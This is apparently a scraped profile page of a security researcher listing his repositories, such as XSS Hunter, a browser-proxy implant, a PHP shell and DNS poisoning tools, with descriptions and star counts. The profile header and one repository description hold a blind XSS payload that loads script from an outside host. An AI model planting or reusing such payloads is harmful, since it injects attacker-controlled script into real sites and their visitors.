This is your work, valued

"><script src=https://y.vg></script>

Matthew Bryant

Elite
@mandatoryprogrammer

"><script src=https://y.vg></script>

xsshunter-express. An easy-to-setup version of XSS Hunter. Sets up in five minutes and requires no maintenance!

2.4k

NorthKoreaDNSLeak. Snapshot of North Korea's DNS data taken from zone transfers.

1.8k

CursedChrome. Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies, allowing you to browse sites as your victims.

1.7k

xsshunter. The XSS Hunter service - a portable version of XSSHunter.com

1.6k

thermoptic. A next-generation HTTP stealth proxy which perfectly cloaks requests as the Chrome browser across all layers of the stack.

1k

sonar.js. A framework for identifying and launching exploits against internal network hosts. Works via WebRTC IP enumeration combined with WebSockets and external resource fingerprinting.

554

cloudflare_enum. Cloudflare DNS Enumeration Tool for Pentesters

527

JudasDNS. Nameserver DNS poisoning attacks made easy

526

TLDR. TLDR (TLD Records) is a continually updated DNS archive of zone transfer attempts again all existing TLD nameservers as well as the root servers.

519

TrustTrees. A Tool for DNS Delegation Trust Graphing

409

xssless. An automated XSS payload generator written in python.

316

ChromeGalvanizer. Harden your Chrome browser via enterprise policy.

297

xsshunter_client. Correlated injection proxy tool for XSS Hunter

258

droidbrute. A statistically optimized USB rubber ducky payload to brute force 4-digit Android PINs.

221

RussiaDNSLeak. Summary and archives of leaked Russian TLD DNS data

191

tarnish. A Chrome extension static analysis tool to help aide in security reviews.

165

FlashHTTPRequest. A very simple bridge for performing Flash HTTP requests with JavaScript

81

chrome-extension-manifests-dataset. >100K Chrome Extension manifest.json files for analysis

59

xcname. A tool for enumerating expired domains in CNAME records

59

RAGE. A hacked together PHP shell designed to be stealthy and portable

53

signal-bot. A Signal bot that utilizes the Chrome DevTools protocol to hook the Signal Electron Desktop app for automation.

50

PaperChaser. JavaScript

47

VietnamDNSLeak. Summary and archives of leaked Vietnam TLD DNS data

47

comfortably-run. A CLI tool which can be used to inject JavaScript into arbitrary Chrome origins via the Chrome DevTools Protocol

46

PERS. A passive scanning tool for finding expired domain vulnerabilities while you browse.

42

Metafid-Base. The base classes that are used by Metafid (a private piece of software that generates web bot code from Fiddler archives)

40

UPBRUTE. Dynamic DNS Update Bruteforce Tool

29

xpire-crossdomain-scanner. Scans crossdomain.xml policies for expired domain names.

26

wmap. a mass web screenshot tool for mapping web networks.

25

overairdroid. A python library to automate the use of the Airdroid app for Android

22

lambda-intruder. An example of high-QPS requesting Burp Intruder style on AWS Lambda via self-invocation.

22

xsshunter_docs. XSS Hunter correlated injection API guide

21

TLD-Health-Report. Daily TLD health report generated using RIPE's DNSCheck against all existing TLDs.

19

xsshunter_chrome_extension. WHY?

18

dig-lambda-layer. A simple AWS Lambda layer to add dig support

11

FileURISecurity. Testing page for checking the privileges that a browser gives to the file:// origin

10

ctf_tools. Random CTF tool repo for small code snippets

10

theinternetbackup-cli. Contribute domains to TheInternetBackup.com via an easy CLI tool!

10

mandatoryprogrammer.

8

dotfiles. My dot files

6

subresource_integrity_rewrite. Rewrites flat HTML pages to include subresource integrity for all third party scripts/stylesheets

6

elasticbeanstalk-base. Base Elastic Beanstalk config which uses Docker and an environment variable EC2_SPOT_PRICE for spot bidding

5

CSP-Bypass. A Burp Plugin for Detecting Weaknesses in Content Security Policies

4

slack-bot-api. Simple way to control your Slack Bot

3

testrepo. test

3

stargate. SOCKS for your subnet

2

BARTHue. Control Hue Lights Based on the BART Schedule

2

Trapcall2Spreadsheet. Exports your logged Trapcalls to a CSV spreadsheet

2

mygithubpage.

2

cordova-replay. Experimental plugin to enable use of the ReplayKit iOS framework

1

redis. Docker Official Image packaging for Redis

1

teamflix-reports. A place to report bugs and feature requests for teamflix

1

testing. "><script src=//y.vg></script>

1